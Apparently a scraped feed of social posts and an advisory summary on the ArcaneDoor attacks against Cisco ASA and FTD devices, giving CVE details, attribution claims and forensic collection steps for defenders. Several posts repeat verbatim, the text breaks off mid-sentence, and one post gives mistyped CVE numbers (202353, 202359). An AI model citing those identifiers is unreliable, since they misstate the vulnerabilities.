The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
3. Collect the outputs of the following commands:
   • show version
   • verify /SHA-512 system:memory/text
   • debug menu memory 8
4. Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

• Line Runner (PDF)
• Line Dancer (PDF)

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
3. Collect the outputs of the following commands:
   • show version
   • verify /SHA-512 system:memory/text
   • debug menu memory 8
4. Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

• Line Runner (PDF)
• Line Dancer (PDF)

cc: @todb @campuscodi @mttaggart @DaveMWilburn

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
https://www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 https://www.cisa.gov/news-events/alerts/2024/04/24/cisa-adds-three-known-exploited-vulnerabilities-catalog

See original toot above for information on the Cisco exploited zero-days.

#Cisco #zeroday #vulnerability #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #KEV #CISA #KnownExploitedVulnerabilitiesCatalog

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

• Cisco Adaptive Security Appliance (ASA) Software
• Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

Urgent Remediation Advised for Cisco ASA and FTD Vulnerabilities

Date: 24 April 2024
CVE: [[CVE-2024-20353]], [[CVE-2024-20358]], [[CVE-2024-20359]]
Vulnerability Type: Denial of Service and Privilege Escalation
CWE: [[CWE-20]], [[CWE-264]]
Sources: NCSC's official release Cisco's security advisory

Issue Summary

The UK's National Cyber Security Centre (NCSC) has reported active exploitation of critical vulnerabilities in Cisco devices running Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The vulnerabilities allow unauthenticated denial of service and authenticated command execution with elevated privileges. No specific configuration is required. These vulnerabilities are rumored to be abused by state backed threat actors for espionage.

Technical Key Findings

CVE-2024-20353 involves the ASA and FTD's management and VPN web servers, enabling remote attackers to cause disruptive reloads. CVE-2024-20358 and CVE-2024-20359 require administrative access, allowing execution of arbitrary commands or code under root privileges.

Vulnerable Products

• Cisco Adaptive Security Appliance (ASA) Software
• Cisco Firepower Threat Defense (FTD) Software

Impact Assessment

Successful exploitation could lead to service disruption and unauthorized administrative access to network devices, potentially leading to further lateral movement within networks. Cisco is aware that CVE-2024-20353 and CVE-2024-20359 are being actively exploited.

Patches or Workaround

Cisco has released free software updates that address the vulnerability described in this advisory.

Tags

#Cisco #CVE202420353 #CVE202420358 #CVE202420359 #DenialOfService #PrivilegeEscalation #CyberSecurity

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

#Cisco #activeexploitation #eitw #CVE_2024_20353 #CVE_2024_20359 #UAT4356 #threatintel

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

#Cisco #CVE_2024_20353 #CVE_2024_20359 #activeexploitation #IR #DFIR #eitw

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

#Cisco #ASA #zeroday #vulnerability #eitw #activeexploitation #CVE_2024_20353 #CVE_2024_20359 #China #cyberespionage #threatintel #IOC #UAT4356 #CISA #KnownExploitedVulnerabilitiesCatalog #KEV

So, if you think you've maybe got #ArcaneDoor / #LineDancer issues on your ASA (discovery methods here: https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
3. Collect the outputs of the following commands:
   • show version
   • verify /SHA-512 system:memory/text
   • debug menu memory 8
4. Open a case with the Cisco Technical Assistance Center (TAC, https://www.cisco.com/c/en/us/support/index.html). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE (#CVE_2024_20358) in between the Talos publication and the CISCO advisory page (https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_attacks_event_response), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

#CVE_2024_20359 #CVE_2024_20353 #infosec #cybersecurity

Final question for anyone still reading: why the debug menu memory 8? What does it do?

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware: